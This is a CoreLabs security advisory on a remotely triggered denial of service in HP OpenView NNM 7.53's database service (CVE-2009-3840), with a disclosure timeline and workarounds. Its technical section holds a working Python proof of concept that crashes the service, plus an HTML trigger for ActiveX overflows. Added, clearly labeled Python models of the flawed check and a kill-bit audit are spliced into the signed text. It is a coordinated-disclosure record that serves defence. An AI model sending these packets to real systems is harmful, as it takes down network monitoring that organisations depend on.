Core Security Technologies Advisory 2009.0814  
Source: packetstormsecurity.com (PACKETSTORM:82767), posted Nov 18, 2009  
EPSS: 0.286 (percentile 96.9%)  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Core Security Technologies - CoreLabs Advisory  
http://www.coresecurity.com/corelabs/  
  
HP Openview NNM 7.53 Invalid DB Error Code vulnerability  
  
  
  
1. *Advisory Information*  
  
Title: HP Openview NNM 7.53 Invalid DB Error Code vulnerability  
Advisory Id: CORE-2009-0814  
Advisory URL:  
http://www.coresecurity.com/content/openview_nnm_internaldb_dos  
Date published: 2009-11-17  
Date of last update: 2009-11-17  
Vendors contacted: HP  
Release mode: Coordinated release  
  
  
2. *Vulnerability Information*  
  
Class: External Initialization of Trusted Variables [CWE-454]  
Impact: Denial of Service  
Remotely Exploitable: Yes  
Locally Exploitable: No  
Bugtraq ID: N/A  
CVE Name: CVE-2009-3840  
  
  
3. *Vulnerability Description*  
  
HP Openview Network Node Manager is one of the most widely-deployed  
network monitoring and management platforms used throughout enterprise  
organizations today. The platform includes many server and client-side  
core components with a long list of previously disclosed security bugs.  
In this case, a remotely exploitable vulnerability was found in the  
database server core component used by NNM. Exploitation of the bug does  
not require authentication and will lead to a remotely triggered denial  
of service of the internal database service.  
  
  
4. *Vulnerable packages*  
  
. HP Openview NNM 7.53  
  
Other versions may be vulnerable but were not tested. Refer to the  
vendor's security bulletin for a full list.  
  
  
5. *Non-vulnerable packages*  
  
Refer to the vendor's security bulletin.  
  
  
6. *Vendor Information, Solutions and Workarounds*  
  
The vendor issued security bulletin HPSBMA02477 SSRT090177 to address  
the problem and provide fixes. It is available at  
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01926980  
  
The database service of HP Openview Network Node Manager is remotely  
accessible on port 2690/tcp. Restricting or blocking access to that port  
will prevent exploitation but may prevent normal operation of Openview  
NNM; at the time of publication HP had not determined the operational  
impact of doing so, and its bulletin does not recommend this workaround  
(see the report timeline below).  
  
For the ActiveX control described in section 8.2, which HP reports is not  
used by any NNM component, HP recommends setting the kill bit for its  
CLSID (A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE); see [2] for the procedure.  
  
  
7. *Credits*  
  
This vulnerability was discovered and researched by Damian Frizza from  
Core Security Technologies.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
  
8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service*  
  
HP Openview Network Node Manager includes an embedded database engine  
service that is enabled by default and accepts remote connections on  
port 2690/tcp. The service is implemented by 'ovdbrun.exe', which is  
started automatically at boot. For certain transactions, upon receiving a  
packet from the network, the service attempts to determine and display an  
error string based on an error code number carried in the packet. By  
sending a crafted packet with an invalid error code number it is possible  
to remotely trigger an exception that forces abnormal termination of the  
service. It is unlikely that the bug could be exploited for anything  
other than a remote denial of service.  
  
The following code excerpt explains the problem:  
  
/-----  
005FED51 MOVZX EDX,BYTE PTR SS:[ESP+2] #FCFF  
005FED56 MOVSX ECX,WORD PTR SS:[ESP+3]  
005FED5B CMP ECX,-1  
005FED5E MOVSX EAX,WORD PTR SS:[ESP+5] #FCFF  
005FED63 MOV DWORD PTR DS:[ESI+10],EDX  
005FED66 MOV EDX,DWORD PTR SS:[ESP+7]  
005FED6A MOV DWORD PTR DS:[ESI+14],ECX  
005FED6D MOV DWORD PTR DS:[ESI+18],EAX  
005FED70 MOV DWORD PTR DS:[ESI+C],EDX  
005FED73 JGE SHORT ovdbrun.005FED7E  
005FED75 CMP EAX,-1  
005FED78 JGE SHORT ovdbrun.005FED7E  
005FED7A CMP ECX,EAX  
005FED7C JE SHORT ovdbrun.005FED83  
005FED7E MOV EAX,1  
005FED83 ADD ESP,0C  
005FED86 RETN  
  
-----/  
  
The code above screens the Error Code fields of the inbound network  
packet. The two signed 16-bit values at offsets 3 and 5 are each compared  
against -1: if either is -1 or greater the routine returns 1 and no error  
is reported; if both are below -1 and equal to each other, the value is  
passed back as an error code and the caller displays a MessageBox with  
the descriptive string looked up for it. The check only confirms that the  
fields hold a negative code, not that the code is one the service knows;  
a crafted packet carrying any negative value other than -1 in both fields  
(0xFEFF, i.e. -257, in the proof of concept below) therefore reaches the  
lookup, which fails to find a string for it, triggering a non-recoverable  
error that terminates the server process.  
  
The following Python code can be used to reproduce the bug; the field  
layout matches the offsets read by the routine above:  
  
/-----  
#!/usr/bin/env python  
import socket  
import struct  
import sys  
  
# Packet layout (assuming [ESP] in the routine above is the packet start):  
#   byte  @0 : 2  
#   word  @1 : 0  (the routine's byte read at +2 lands on its high byte)  
#   word  @3 : Error Code, signed; 0xFEFF = -257 has no error string  
#   word  @5 : second Error Code field, must equal the word at @3  
#   dword @7 : trailing data  
a = struct.pack('<b', 2)  
a += struct.pack('<H', 0)  
a += struct.pack('<H', 0xFEFF)  
a += struct.pack('<H', 0xFEFF)  
a += b"1234"  
  
# Target taken from the command line; 'X.X.X.X' is the advisory's placeholder.  
target_ip = sys.argv[1] if len(sys.argv) > 1 else 'X.X.X.X'  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target_ip, 2690))  
s.sendall(a)  
s.close()  
  
-----/  
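The following Python model is added here as an illustration; it is not code from the advisory or from HP. It reconstructs the decision made by the routine at 005FED51 and contrasts the two ways the caller can treat the code it returns: the unchecked string lookup the advisory describes, and a hardened lookup that never uses an unknown code as a table key. The packet offsets (byte at 2, signed words at 3 and 5, dword at 7) follow the disassembly on the assumption that [ESP] points at the first byte of the received packet; KNOWN_ERROR_STRINGS is a hypothetical stand-in, since the advisory does not list the real error-string table.

```python
#!/usr/bin/env python3
"""Model of the ovdbrun.exe Error Code check shown in the disassembly above.

Added example; not code from the advisory or from HP. Offsets assume [ESP]
is the first byte of the packet. KNOWN_ERROR_STRINGS is a hypothetical
stand-in for the real error-string table, which the advisory does not list.
"""
import struct

# Hypothetical table standing in for the one the error path consults.
KNOWN_ERROR_STRINGS = {-2: "transaction aborted", -3: "record not found"}


def parse_error_code(packet):
    """Mirror the routine at 005FED51..005FED86.

    Returns 1 when the packet signals no error, otherwise the negative
    error code carried in the two 16-bit Error Code fields.
    """
    if len(packet) < 11:
        raise ValueError("routine reads 11 bytes; packet is shorter")
    flag = packet[2]                                   # MOVZX EDX, BYTE [ESP+2]
    code_a = struct.unpack_from("<h", packet, 3)[0]    # MOVSX ECX, WORD [ESP+3]
    code_b = struct.unpack_from("<h", packet, 5)[0]    # MOVSX EAX, WORD [ESP+5]
    trailer = struct.unpack_from("<I", packet, 7)[0]   # MOV EDX, DWORD [ESP+7]
    # flag and trailer are only stored into the caller's structure
    # ([ESI+10], [ESI+C]); they play no part in the decision below.
    if code_a >= -1:        # CMP ECX,-1 / JGE -> MOV EAX,1
        return 1
    if code_b >= -1:        # CMP EAX,-1 / JGE -> MOV EAX,1
        return 1
    if code_a == code_b:    # CMP ECX,EAX / JE  -> return EAX unchanged
        return code_a
    return 1


def error_string_unchecked(code):
    """The behaviour the advisory describes: the lookup trusts the code it
    is handed. An unknown negative code raises here, as the service dies."""
    return KNOWN_ERROR_STRINGS[code]


def error_string_checked(code):
    """Hardened form: an unknown code is reported, never used as a key."""
    return KNOWN_ERROR_STRINGS.get(code, "unknown error code %d" % code)


def build_packet(error_code, trailer=b"1234"):
    """Packet in the layout of the proof of concept above, with both
    Error Code fields set to the same signed 16-bit value."""
    return (struct.pack("<b", 2) + struct.pack("<H", 0)
            + struct.pack("<h", error_code) * 2 + trailer)


if __name__ == "__main__":
    for code in (5, -1, -2, -257):          # -257 == 0xFEFF from the PoC
        rc = parse_error_code(build_packet(code))
        outcome = error_string_checked(rc) if rc != 1 else "no error path"
        print("Error Code %6d -> routine returns %5d -> %s" % (code, rc, outcome))
```

Running the model shows the gap the advisory exploits: 5 and -1 never reach the error path, -2 resolves to a known string, and -257 passes the routine's check but has no string, so the unchecked lookup raises where the checked one reports the code and continues.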
  
  
  
8.2. *Additional information: Low severity bugs in ActiveDom.ocx ActiveX*  
  
The ActiveX control 'ActiveDom.ocx' is shipped with HP Openview NNM 7.53  
and installed by default. The control is prone to multiple memory  
corruption bugs caused by erroneous handling of overly long strings passed  
to several of its methods. These bugs are considered of low severity  
because the control is not marked Safe for Scripting or Safe for  
Initialization [1] and therefore cannot be exploited without explicit  
user consent: under its default settings Internet Explorer does not script  
controls that are not marked as safe. Since the vendor reports the control  
as neither used nor required by any component of OpenView NNM, deployed  
systems whose security settings have been changed to allow exploitation of  
these bugs should be very rare. Nonetheless, information about them is  
included below for completeness.  
  
Some of the ActiveX control's methods with implementation flaws are:  
  
/-----  
DisplayName(str)  
AddGroup(str)  
InstallComponent(str)  
Subscribe(str, str, int)  
  
-----/  
  
The following excerpt from method DisplayName() demonstrates the problem:  
  
/-----  
2000D408 MOV DWORD PTR SS:[EBP-4],-1  
2000D40F JMP SHORT ACTIVE~1.2000D3D6  
2000D411 MOV EAX,ACTIVE~1.200361A0  
2000D416 JMP <JMP.&MSVCRT.__CxxFrameHandler>  
2000D41B MOV EAX,ACTIVE~1.2000D4A8  
2000D420 CALL <JMP.&MSVCRT._EH_prolog>  
2000D425 SUB ESP,10  
2000D428 PUSH EBX  
2000D429 PUSH ESI  
2000D42A PUSH EDI  
2000D42B MOV DWORD PTR SS:[EBP-10],ESP  
2000D42E MOV DWORD PTR SS:[EBP-14],ECX  
2000D431 XOR EBX,EBX  
2000D433 MOV DWORD PTR SS:[EBP-4],EBX  
2000D436 LEA ESI,DWORD PTR DS:[ECX+28]  
2000D439 MOV ECX,DWORD PTR DS:[ESI] ; ESI = 00038178  
2000D43B MOV EAX,DWORD PTR DS:[ECX] ;  
2000D43D CALL DWORD PTR DS:[EAX+48] ;  
  
-----/  
  
The following HTML code can be used to trigger the bug (Internet Explorer  
will only run it if the control is marked safe or the browser has been  
configured to script controls not marked as safe):  
  
/-----  
<html>  
<object classid='clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE' id='target'  
></object>  
<script>  
// 10000-character string passed to DisplayName(), which mishandles  
// overly long string arguments  
var a = "";  
for (var i = 0; i < 10000; i++)  
    a = a + "A";  
target.DisplayName(a);  
</script>  
</html>  
  
-----/  
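The low-severity rating above rests on the control's registration state, and the advisory later notes that the details are published so users can verify, and if necessary correct, that configuration. The following Python audit routine is an added example, not part of the advisory or of HP's bulletin: for a given CLSID it reports whether the control is registered, whether the kill bit (bit 0x400 of the "Compatibility Flags" DWORD under the ActiveX Compatibility key, the mechanism referenced in [2]) is set, and whether the control is listed in the Safe for Scripting and Safe for Initializing component categories described in [1]. The registry reader is injectable so the logic can be exercised off Windows; the in-memory registry contents are constructed, the CATID GUIDs are the documented Microsoft values, and the CLSID is the one from this advisory.

```python
#!/usr/bin/env python3
"""Audit how Internet Explorer would treat an ActiveX control.

Added example; not from the advisory or HP's bulletin. Registry locations
are the documented ones:
  HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{CLSID}
      "Compatibility Flags" (REG_DWORD), 0x400 = kill bit          [ref 2]
  HKCR\\CLSID\\{CLSID}\\Implemented Categories\\{CATID}
      7DD95801-... = Safe for Scripting, 7DD95802-... = Safe for Initializing
"""
import sys

ACTIVEDOM_CLSID = "{A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE}"   # from the advisory
KILL_BIT = 0x400
COMPAT_KEY = r"HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
CATID_SAFE_FOR_SCRIPTING = "{7DD95801-9882-11CF-9FA9-00AA006C42C4}"
CATID_SAFE_FOR_INITIALIZING = "{7DD95802-9882-11CF-9FA9-00AA006C42C4}"


class DictRegistry:
    """In-memory stand-in: {full_key_path: {value_name: value}}."""

    def __init__(self, keys):
        self.keys = keys

    def key_exists(self, path):
        return path in self.keys

    def read_dword(self, path, name):
        return self.keys.get(path, {}).get(name)


class WinRegistry:
    """Live reader; only usable on Windows, where the winreg module exists."""
    ROOTS = {"HKLM": "HKEY_LOCAL_MACHINE", "HKCR": "HKEY_CLASSES_ROOT"}

    def __init__(self):
        import winreg
        self.winreg = winreg

    def _open(self, path):
        root, _, sub = path.partition("\\")
        return self.winreg.OpenKey(getattr(self.winreg, self.ROOTS[root]), sub)

    def key_exists(self, path):
        try:
            self._open(path).Close()
            return True
        except OSError:
            return False

    def read_dword(self, path, name):
        try:
            with self._open(path) as key:
                value, kind = self.winreg.QueryValueEx(key, name)
        except OSError:
            return None
        return value if kind == self.winreg.REG_DWORD else None


def audit_control(clsid, reg):
    """Report registration, kill bit and safe-for-* categories for a CLSID."""
    clsid_key = r"HKCR\CLSID" + "\\" + clsid
    cats = clsid_key + r"\Implemented Categories"
    flags = reg.read_dword(COMPAT_KEY + "\\" + clsid, "Compatibility Flags") or 0
    report = {
        "registered": reg.key_exists(clsid_key),
        "kill_bit": bool(flags & KILL_BIT),
        "safe_for_scripting": reg.key_exists(cats + "\\" + CATID_SAFE_FOR_SCRIPTING),
        "safe_for_initializing": reg.key_exists(cats + "\\" + CATID_SAFE_FOR_INITIALIZING),
    }
    # A web page can call the control's methods under IE's default
    # Internet-zone settings only if it is registered, not kill-bitted and
    # marked Safe for Scripting; Safe for Initializing governs <PARAM> data.
    report["scriptable_by_default"] = (
        report["registered"] and not report["kill_bit"]
        and report["safe_for_scripting"])
    return report


# Constructed sample mirroring the default NNM 7.53 state the advisory
# describes: control registered, no kill bit, no safe-for-* categories.
SAMPLE_DEFAULT = DictRegistry({r"HKCR\CLSID" + "\\" + ACTIVEDOM_CLSID: {}})

if __name__ == "__main__":
    reg = WinRegistry() if sys.platform == "win32" else SAMPLE_DEFAULT
    for item in sorted(audit_control(ACTIVEDOM_CLSID, reg).items()):
        print("%-24s %s" % item)
```

On a 64-bit Windows host the 32-bit Internet Explorer process also honours the kill bit under HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility, so both hives should be checked there; the report covers Internet Explorer's treatment of the control only, not other applications that might instantiate it.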
  
  
  
9. *Report Timeline*  
  
. 2009-08-12:  
Core Security Technologies notifies the HP Software Security Response  
Team (SSRT) of the vulnerability and preliminary schedule to publish the  
corresponding security advisory on September 8th, 2009. Core asks for  
acknowledgement of the email within 2 working days and whether HP SSRT  
prefers to receive the technical description of the bug encrypted or in  
plaintext.  
  
. 2009-08-12:  
HP SSRT asks Core to send the technical description of the vulnerability  
encrypted using the PGP key with id 0x08B83D45.  
  
. 2009-08-14:  
Core Security Technologies sends technical details encrypted to HP SSRT.  
  
. 2009-08-18:  
HP SSRT informs Core that HP engineering has been notified and will  
notify Core when they have a schedule estimate. SSRT assigned the IDs  
SSRT090177 and SSRT090178 to the vulnerabilities reported by Core.  
  
. 2009-08-27:  
Core requests a status update from HP SSRT.  
  
. 2009-08-27:  
HP SSRT informs Core that the vulnerabilities are in third-party code  
and that the third-party vendor has been notified but there isn't a  
schedule for fixes yet. HP SSRT indicates that it is sure HP will not  
have a solution ready by September 7th.  
  
. 2009-08-27:  
Core informs the HP team that the publication was re-scheduled to  
September 21st and requests an update to continue coordinating the  
release of fixes and publication of the advisory as soon as possible.  
  
. 2009-08-28:  
The HP team informs Core that the third party is planning a release on  
October 30th for the first vulnerability. SSRT also notes that ActiveX  
vulnerabilities are still being investigated.  
  
. 2009-08-31:  
Core Security Technologies acknowledges the information sent by HP SSRT.  
  
. 2009-09-01:  
The HP team communicates that they will inform Core Security  
Technologies when the fix is available.  
  
. 2009-09-04:  
Core asks the HP SSRT to map HP's internal IDs to each of the reported  
vulnerabilities.  
  
. 2009-09-04:  
The HP SSRT indicates that SSRT090177 corresponds to the embedded  
database vulnerability and SSRT090178 to the ActiveX bugs.  
  
. 2009-09-10:  
Core Security Technologies notifies HP SSRT that publication of the  
advisory has been re-scheduled to October 30th to be able to coordinate  
the release with the issuance of fixes by the third party vendor and  
that if non-third-party vulnerabilities (the ActiveX bugs) could be  
fixed earlier they would be described in a separate advisory.  
  
. 2009-09-11:  
HP SSRT says that it will send any new information to Core on the  
ActiveX bugs if they have something to publish before October 30th.  
  
. 2009-09-21:  
The HP team informs Core that they are having some problems reproducing  
the ActiveX vulnerabilities reported. The NNM engineers have used the  
provided proof-of-concept exploit but did not see any effect. SSRT asks  
if an overflow was confirmed, if process failure was detected and if a  
debugger or a different procedure was used.  
  
. 2009-09-21:  
Core Security Technologies notifies the HP SSRT that the proof of  
concept crash can be observed using a classic debugger or a just-in-time  
debugger that is attached only after an abnormal exception is detected.  
Core also sends HP SSRT another proof of concept HTML code that crashes  
the ActiveX and can be observed without the need of a debugger.  
  
. 2009-09-22:  
The HP team acknowledges previous email from Core with the new PoC to  
reproduce the crashes without a debugger.  
  
. 2009-10-06:  
Core requests a status update from the SSRT noting that it hasn't  
received any update since September 22nd. The advisory is still  
scheduled for publication on October 30th and Core is waiting for  
confirmation that the ActiveX bugs were reproduced and the fix for them  
could be published earlier separately.  
  
. 2009-10-09:  
SSRT sends an update indicating that fixes from the third party for SSRT090177  
have been received and HP is currently in the process of testing them on  
all platforms expecting an update by October 16th. The ActiveX bugs have  
been reproduced and HP determined that the vulnerable control is not  
necessary for NNM. HP will recommend customers to set the kill bit for  
the control (clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE) as workaround.  
  
. 2009-10-19:  
Core requests a status update and confirmation that HP will be ready to  
release fixes by October 30th. Core asks if fixes will be issued for all  
vulnerable versions of NNM, whether the fixes or patches will remove the  
unnecessary ActiveX control or just ask customers to implement the  
workaround. Core requests the complete lists of vulnerable versions and  
platforms of NNM and asks if the patches will include fixes to other  
bugs. Also, Core notes that the vendor of the third party component has  
been identified and that since the bug may affect other products Core  
will start a separate vulnerability report process directly with that  
vendor.  
  
. 2009-11-02:  
Email from Core asking for a status update and an acknowledgement and  
response to the questions from the previous email. Core notes that the  
previously agreed publication date for the advisory has already passed  
without any update from HP. The publication date has been unilaterally  
moved to Wednesday November 4th, 2009 and is considered final pending a  
response from HP.  
  
. 2009-11-03:  
Response from HP SSRT stating that there is not an estimated release  
date for patches to some platforms. With regards to the ActiveX bugs, a  
security bulletin will be published on November 9th recommending setting  
the kill bit.  
  
. 2009-11-03:  
Core indicates that since there isn't an estimated patch release date  
for missing platforms the advisory will be published on November 9th and  
will include guidance on how to implement workarounds for both problems.  
Core asks SSRT about the potential impact of blocking or restricting  
access to the vulnerable service as a workaround.  
  
. 2009-11-05:  
SSRT suggests that, given that Core's advisory will be published earlier  
than HP's security bulletin, it should have workarounds for all platforms  
and not just for the ones that may not have a patch available  
afterwards. HP is still investigating the impact of blocking or  
restricting access to the vulnerable port. SSRT asks if Core wants any  
acknowledgement in its security bulletin.  
  
. 2009-11-05:  
Core asks what is the planned publication date for HP's bulletin and  
requests that the bulletin credits the discoverer (Damian Frizza).  
Provided that the estimated date for publishing the bulletin is not  
unreasonable Core would rather schedule the publication of the advisory  
to match HP's.  
  
. 2009-11-06:  
SSRT informs Core that their estimate is to have hotfixes available  
internally by November 13th and released along with the corresponding  
security bulletins by November 17th. SSRT asks whether CVE numbers should  
be assigned by HP or provided by Core.  
  
. 2009-11-06:  
Core re-schedules publication to November 17th. Core asks SSRT to assign  
the CVE numbers.  
  
. 2009-11-12:  
HP SSRT reports that the ActiveX control is not marked as safe for  
scripting or safe for initialization by default and thus the buffer  
overflows in its methods do not seem to be security issues. SSRT asks if  
Core still considers them security vulnerabilities.  
  
. 2009-11-16:  
HP SSRT provides the CVE id assigned to the denial of service bug and  
indicates that the vendor's security bulletin will not suggest any  
workarounds as the effect of blocking or restricting access to the  
vulnerable service has not been determined.  
  
. 2009-11-16:  
Core confirms that the ActiveX control is not marked as safe for  
scripting or initialization which greatly diminishes the relevance of  
the reported bugs. Nonetheless, the information about the bugs will be  
included in the advisory for the purpose of completeness and to let  
users verify, and if necessary correct, the control's configuration  
settings. Core still recommends that the vendor remove the unnecessary  
control from installation packages and fix the reported bugs, to avoid  
exposure should the control come into use in the future or should an  
alternative exploitation vector be found.  
  
. 2009-11-17:  
Publication of HP Security Bulletin SSRT090177.  
  
. 2009-11-17:  
Advisory CORE-2009-0814 published.  
  
  
  
10. *References*  
  
[1] Safe Initialization and Scripting for ActiveX Controls.  
http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx  
[2] How to stop an ActiveX control from running in Internet Explorer.  
http://support.microsoft.com/kb/240797  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
http://www.coresecurity.com/corelabs.  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. CORE IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources are  
exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core Security  
Technologies augments its leading technology solution with world-class  
security consulting services, including penetration testing and software  
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core  
Security Technologies can be reached at 617-399-6980 or on the Web at  
http://www.coresecurity.com.  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2009 Core Security  
Technologies and (c) 2009 CoreLabs, and may be distributed freely  
provided that no fee is charged for this distribution and proper credit  
is given.  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.8 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat  
YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF  
=cR49  
-----END PGP SIGNATURE-----  